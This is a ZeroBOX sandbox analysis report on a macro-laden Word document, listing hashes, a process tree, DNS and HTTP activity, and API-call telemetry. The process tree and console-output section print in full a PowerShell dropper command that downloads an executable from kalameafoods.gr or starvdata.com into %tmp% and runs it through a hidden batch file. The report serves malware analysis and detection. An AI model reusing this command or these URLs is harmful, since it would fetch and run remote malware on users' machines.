Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 25, 2021, 8:44 a.m.	June 25, 2021, 8:53 a.m.

Size	55.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: 12345, Template: Normal.dotm, Last Saved By: 12345, Revision Number: 146, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:16:00, Create Time/Date: Wed Sep 5 08:52:00 2018, Last Saved Time/Date: Wed Sep 5 10:14:00 2018, Number of Pages: 1, Number of Words: 116, Number of Characters: 663, Security: 0
MD5	`54b6d7cd8137b1d76ee21be9cf81a480`
SHA256	`fa42efcc6fdaafe251de452d806503b6c21fa6e8f5696f9ea23afe9bfb215623`
CRC32	`AA2BDC3C`
ssdeep	`768:wuYQxDUL7efMSbVrrboYzcHR9GsmWQeLie7wv:3xDqqfPbFC0AJC`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\AuthenticationCode-3139821.doc
7388
- cmd.exe cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"
  5096
  - powershell.exe powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden"
    8728
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\owernice38.bat" "
      3660
      - powershell.exe powershell "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')}
        3908

Name	Response	Post-Analysis Lookup
www.starvdata.com	CNAME starvdata.com A 108.179.246.83	108.179.246.83
starvdata.com	A 108.179.246.83	108.179.246.83
kalameafoods.gr	A 185.25.20.5	185.25.20.5

IP Address	Status	Action
108.179.246.83	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
185.25.20.5	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 25, 2021, 8:44 a.m.			0	0
IsDebuggerPresent June 25, 2021, 8:44 a.m.			0	0

Command line console output was observed (13 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')} console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The remote server retur console_handle: 0x00000023	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: ned an error: (404) Not Found." console_handle: 0x0000002f	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: At line:1 char:85 console_handle: 0x0000003b	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + function chaitra2([string] $vonaherT){(new-object system.net.webclient).downl console_handle: 0x00000047	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: oadfile <<<< ($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');star console_handle: 0x00000053	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: t-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http console_handle: 0x0000005f	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: ://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre. console_handle: 0x0000006b	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: orau')} console_handle: 0x00000077	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000083	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 93 events)

Time & API	Arguments	Status	Return
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2a20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c31a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c29e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c29e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c29e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c25e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c2fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3320 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x001c3260 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c6ad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c71d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c71d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c71d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c7498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 25, 2021, 8:44 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://kalameafoods.gr/supetre.orau
suspicious_features	GET method with no useragent header	suspicious_request	GET http://starvdata.com/supetre.orau
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.starvdata.com/supetre.orau

Performs some HTTP requests (3 events)

request	GET http://kalameafoods.gr/supetre.orau
request	GET http://starvdata.com/supetre.orau
request	GET http://www.starvdata.com/supetre.orau

Allocates read-write-execute memory (usually to unpack itself) (50 out of 294 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06720000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06740000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ea71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eac5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x673a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66c91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70731000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70734000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x601f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x618d5000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 1835008 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02692000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a71000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a72000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02693000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02694000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02695000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02696000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 8728 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
